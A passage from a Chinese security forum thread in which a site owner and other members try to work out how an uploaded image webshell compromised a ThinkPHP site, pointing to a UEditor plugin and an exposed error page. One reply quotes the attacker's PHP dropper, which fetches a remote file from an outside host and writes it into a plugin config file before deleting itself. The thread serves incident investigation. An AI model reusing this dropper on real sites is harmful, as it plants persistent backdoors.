首页
社区
课程
招聘
[已解决] [求助]服务器被入侵有日志这些能找出漏洞吗 50.00雪花
发表于: 2020-8-23 16:06 3827

[已解决] [求助]服务器被入侵有日志这些能找出漏洞吗 50.00雪花

2020-8-23 16:06
3827
收藏
免费 0
支持
分享
最新回复 (51)
雪    币: 348
活跃值: (4346)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
26
wx_三五瓶 他上传都是直接上传的图片马,但是他怎么运行的
可能是利用了一些其他漏洞把图片后缀改成php了
2020-8-23 20:37
0
雪    币: 10
活跃值: (557)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
27
现在应该没有解析漏洞吧
2020-8-23 20:40
0
雪    币: 9951
活跃值: (14784)
能力值: ( LV13,RANK:400 )
在线值:
发帖
回帖
粉丝
28
wx_三五瓶 他上传都是直接上传的图片马,但是他怎么运行的
从日志看黑客似乎没有访问过这个wenshell,只是说上传上去了。
2020-8-23 20:41
0
雪    币: 10
活跃值: (557)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
29
能看出在哪上传的吗
2020-8-23 20:42
0
雪    币: 9951
活跃值: (14784)
能力值: ( LV13,RANK:400 )
在线值:
发帖
回帖
粉丝
30
wx_三五瓶 能看出在哪上传的吗
从结果看时候是从通过ueditor编辑器插件上传的,日志没有相关请求,不知道是被删了还是啥的。
2020-8-23 20:44
0
雪    币: 348
活跃值: (4346)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
31
wx_三五瓶 他上传都是直接上传的图片马,但是他怎么运行的
而且你那个网站好像还有点问题随便访问一个不存在的页面就会[0] HttpException in App.php line 535
模块不存在:12333 本来应该弹404页面的
2020-8-23 20:45
0
雪    币: 9951
活跃值: (14784)
能力值: ( LV13,RANK:400 )
在线值:
发帖
回帖
粉丝
32
EX呵呵 而且你那个网站好像还有点问题随便访问一个不存在的页面就会[0] HttpException in App.php line 535 模块不存在:12333 本来应该弹404页面的
对,ThinkPHP错误日志没禁用,哈哈。
2020-8-23 20:46
0
雪    币: 348
活跃值: (4346)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
33
wmsuper 从结果看时候是从通过ueditor编辑器插件上传的,日志没有相关请求,不知道是被删了还是啥的。
感觉改php后缀应该也是通过编辑器插件搞的吧
2020-8-23 20:46
0
雪    币: 10
活跃值: (557)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
34
我知道有问题,只是很想知道上传点在哪,我重做在多次系统都没有用,源码有上传点
2020-8-23 20:47
0
雪    币: 348
活跃值: (4346)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
35
wmsuper 对,ThinkPHP错误日志没禁用,哈哈。
我刚刚查了一下说可以禁用呀
2020-8-23 20:47
0
雪    币: 9951
活跃值: (14784)
能力值: ( LV13,RANK:400 )
在线值:
发帖
回帖
粉丝
36
wmsuper 从结果看时候是从通过ueditor编辑器插件上传的,日志没有相关请求,不知道是被删了还是啥的。
先更新插件,不行再说吧
2020-8-23 20:47
0
雪    币: 348
活跃值: (4346)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
37
wx_三五瓶 我知道有问题,只是很想知道上传点在哪,我重做在多次系统都没有用,源码有上传点
看看编辑器插件
2020-8-23 20:48
0
雪    币: 10
活跃值: (557)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
38
wmsuper 先更新插件,不行再说吧
不知道上传点在哪呗  那他的shell到底怎么连接啊,有方法么
2020-8-23 20:49
0
雪    币: 348
活跃值: (4346)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
39
http://1.ssrrm.cn/public/static/ueditor
2020-8-23 20:50
0
雪    币: 10
活跃值: (557)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
40
EX呵呵 http://1.ssrrm.cn/public/static/ueditor
这里访问是直接报错的啊
2020-8-23 20:51
0
雪    币: 348
活跃值: (4346)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
41
检查一下/www/wwwroot/1.ssrrm.cn/public/static/ueditor
2020-8-23 20:57
0
雪    币: 348
活跃值: (4346)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
42
估计那个人是从某个要引用uplode文件夹里的内容的php里访问的
2020-8-23 20:58
0
雪    币: 10
活跃值: (557)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
43
EX呵呵 估计那个人是从某个要引用uplode文件夹里的内容的php里访问的
<?php
// +----------------------------------------------------------------------
// | OneThink [ WE CAN DO IT JUST THINK IT ]
// +----------------------------------------------------------------------
// | Copyright (c) 2013 http://www.thinkphp.cn/ All rights reserved.
// +----------------------------------------------------------------------
// | Author: 天狗 <201912782@qq.com> <http://www.zjzit.cn>
// +----------------------------------------------------------------------

namespace Addons\Attachment;
use Common\Controller\Addon;

/**
 * 附件插件
 * @author 天狗 <201912782@qq.com>
 */
class AttachmentAddon extends Addon{

	public $info = array(
		'name'        => 'Attachment',
		'title'       => '附件',
		'description' => '用于文档模型上传附件',
		'status'      => 1,
		'author'      => 'thinkphp',
		'version'     => '0.1'
	);

	public $admin_list = array(
		'list_grid' => array(
			'id:ID',
			'title:文件名',
			'size:大小',
			'update_time_text:更新时间',
			'document_title:文档标题'
		),
		'model'=>'Attachment',
		'order'=>'id asc'
	);

	public $custom_adminlist = 'adminlist.html';

	public function install(){
		return true;
	}

	public function uninstall(){
		return true;
	}

	/* 显示文档模型编辑页插件扩展信息表单 */
	public function documentEditForm($param = array()){
		$this->assign($param);
		$this->display(T('Addons://Attachment@Article/edit'));
	}

	/* 文档末尾显示附件列表 */
	public function documentDetailAfter($info = array()){
		if(empty($info) || empty($info['id'])){ //数据不正确
			return ;
		}

		/* 获取当前文档附件 */
		$Attachment = D('Addons://Attachment/Attachment');
		$map = array('record_id' => $info['id'], 'status' => 1);
		$list = $Attachment->field(true)->where($map)->select();
		if(!$list){ //不存在附件
			return ;
		}

		/* 模板赋值并渲染模板 */
		$this->assign('list', $list);
		$this->display(T('Addons://Attachment@Article/detail'));
	}

	/**
	 * 文档保存成功后执行行为
	 * @param  array  $data     文档数据
	 * @param  array  $catecory 分类数据
	 */
	public function documentSaveComplete($param){
		if (MODULE_NAME == 'Home') {
			list($data, $category) = $param;
			/* 附件默认配置项 */
			$default  = C('ATTACHMENT_DEFAULT');

			/* 合并当前配置 */
			$config = $category['extend']['attachment'];
			$config = empty($config) ? $default : array_merge($default, $config);
			$attach = I('post.attachment');

			/* 该分类不允许上传附件 */
			if(!$config['is_upload'] || !in_array($attach['type'], str2arr($config['allow_type']))){
				return ;
			}

			switch ($attach['type']) {
				case 1: //外链
					# code...
					break;
				case 2: //文件
					$info = json_decode(think_decrypt($attach['info']), true);
					if(!empty($info)){
						$Attachment = D('Addons://Attachment/Attachment');
						$Attachment->saveFile($info['name'], $info, $data['id']);
					} else {
						return; //TODO:非法附件上传,可记录日志
					}
					break;
			}
		}
	}
}


2020-8-23 21:00
0
雪    币: 10
活跃值: (557)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
44
EX呵呵 估计那个人是从某个要引用uplode文件夹里的内容的php里访问的
<table>
	<thead>
		<tr>
			<volist name="list_grid" id="vo">
				<th>{$vo.title}</th>
			</volist>
			<!-- <th>操作</th> -->
		</tr>
	</thead>
	<tbody>
		<volist name="_list" id="lv" key="vo">
		<tr>
			<td>{$lv.id}</td>
			<volist name="list_grid" id="lk">
				<td>{$lv.$lk}</td>
			</volist>
			<td>
				<!-- <a class="update" href="javascript:;" data-id="{$lv.id}">更新</a> -->
			</td>
		</tr>
		</volist>
	</tbody>
</table>
<script type="text/javascript">
	$(function(){
		$('a.update').click(function(){
			id = $(this).data('id');
			alert(id);
		});
	})
</script>


AttachmentAddon.class.php   adminlist.html  就这两个文件  

2020-8-23 21:02
0
雪    币: 348
活跃值: (4346)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
45
他的马是这么写的:<?php file_put_contents('./Addons/Attachment/config.php',file_get_contents('http://www.hhgyrt.space/pic.txt'));unlink('test1.php')?>
2020-8-23 21:03
0
雪    币: 348
活跃值: (4346)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
46
远程下载
2020-8-23 21:03
0
雪    币: 348
活跃值: (4346)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
47
pic.txt才是真马
2020-8-23 21:03
0
雪    币: 10
活跃值: (557)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
48
http://1.142ozgx.cn/Public/static/ueditor/  打开是一个编辑器页面,他利用这里干啥??
2020-8-23 21:05
0
雪    币: 348
活跃值: (4346)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
49
wx_三五瓶 &lt;table&gt; &lt;thead&gt; &lt;tr&gt; &lt;volist&nbsp;name ...
那个人的马在./Addons/Attachment/config.php
2020-8-23 21:06
0
雪    币: 10
活跃值: (557)
能力值: ( LV2,RANK:10 )
在线值:
发帖
回帖
粉丝
50
EX呵呵 pic.txt才是真马
http://1.142ozgx.cn/Public/static/ueditor/   这个编辑器和她上传图片马有什么关系吗,主要是图片马怎么解析的啊
2020-8-23 21:06
0
游客
登录 | 注册 方可回帖
返回
//